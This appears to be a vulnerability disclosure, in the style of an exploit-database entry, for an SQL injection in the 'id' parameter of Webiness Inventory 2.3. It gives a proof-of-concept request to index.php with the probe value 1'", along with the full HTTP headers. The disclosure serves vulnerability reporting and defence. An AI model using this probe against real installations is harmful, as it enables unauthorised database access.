==================================================================================
# Exploit Title: Webiness Inventory 2.3 - 'id' SQL Vulnerability
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/
# Software Link: hhttps://sourceforge.net/projects/webinessinventory/files/
# Version: 2.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Small stock inventory managment application for web.
==================================================================================
# POC - SQL
# Parameters : id
# Attack Pattern : URL encoded GET input id was set to 1'"
# PoC : [PATH]/webiness/index.php?id=1'"
# GET /webiness/index.php?id=1'"&request=document/view/ HTTP/1.1
Referer: http://localhost/webiness/
Cookie: PHPSESSID=c1ug72hmm589pjd933vlk641t2
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
==================================================================================